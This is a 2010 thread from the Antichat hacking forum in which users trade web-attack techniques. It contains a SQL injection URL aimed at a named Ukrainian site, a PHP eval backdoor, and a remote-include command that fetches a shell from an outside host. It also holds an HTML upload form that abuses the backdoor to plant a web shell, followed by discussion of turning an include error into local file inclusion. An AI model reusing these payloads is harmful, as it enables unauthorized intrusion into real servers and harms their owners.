Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.02.2010, 16:36
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
http://fitnesslife.com.ua/index.php?id=7647&show=4nalbum&do=showgall&gid=130 78+union+select+1,2,3,4,@@version,6,7,8,9--+
Скобки не используй и крути
|
|
|
21.02.2010, 18:37
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
скажите как залить полноценный шелл на сервер имея на нем пхп с этим кодом:
PHP код:
<?php eval($_GET["cmd"]); ?>
какой запрос надо составить? |
|
|
|
21.02.2010, 18:44
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Заливаешь свой шелл в формате .txt куда угодно, затем выполняешь
script.php?cmd=include("http://yoursite.com/shell.txt");
Затем через шелл льешь его в нужную папку на целевой сайт.
|
|
|
|
21.02.2010, 18:45
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от daniel_1024
скажите как залить полноценный шелл на сервер имея на нем пхп с этим кодом:
PHP код:
<?php eval($_GET["cmd"]); ?>
какой запрос надо составить? Создаешь у себя на компе файл lypapam.html
PHP код:
<form enctype=multipart/form-data method=post action="http://lala/shell.php?cmd=$f=$_FILES[x];copy($f[tmp_name],$f[name]);"><input type=file name=x><input type=submit></form>
ссылку до переменной http://lala/shell.php?cmd= - редактируешь под себя
открываешь браузером lypapam.html, прикрепляешь шелл и клик на "отправить")
шелл с таким же именем появится в папке с shell.php
|
|
|
|
22.02.2010, 03:30
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
ребят, подскажите пожалуйста..
тут копался и в одном сайте при переходе с одного страницы на другую - выдал ошибку:
Код:
Warning: include(../news.php) [function.include]: failed to open stream: No such file or directory in C:\Plesk\VHOSTS\site.com\httpdocs\biography\index.php on line 107
как я понял - раскрытье путей..
как можно "эксплуатировать" эту ошибку ? |
|
|
|
22.02.2010, 03:43
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
Линк плз в студию.
Либо инклюд, либо раскрытие из-за отсутствия инклюдируемого файла
|
|
|
|
22.02.2010, 04:18
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Сообщение от Bb0y
Линк плз в студию.
Либо инклюд, либо раскрытие из-за отсутствия инклюдируемого файла
 линк могу в личку кинуть, но хочется сам что то делать и понять.. сколько буду тут своими вопросами надоедать )))
|
|
|
|
22.02.2010, 04:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
можно реализовать include ...
|
|
|
|
22.02.2010, 13:58
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
shell_c0de
Strilo4ka
эта ошибка как бы в нижнем части появлается, в колонке вроде новостей.. мне кажется недоделанный скрипт. Вот даже когда захожу в титульную страницу - опять там эта ошибка 
вот так выглядет общий вид:
Код:
Warning: include(news.php) [function.include]: failed to open stream: No such file or directory in C:\Plesk\VHOSTS\site.com\httpdocs\index.php on line 107
Warning: include() [function.include]: Failed opening 'news.php' for inclusion (include_path='.;./includes;./pear') in C:\Plesk\VHOSTS\site.com\httpdocs\index.php on line 107
И как составить LFI ?
|
|
|
|
22.02.2010, 14:36
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Что за бред? Если в качестве пользовательских параметров не передаются данные, используемые для инклуда, это не уязвимость, а лишь раскрытие путей.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
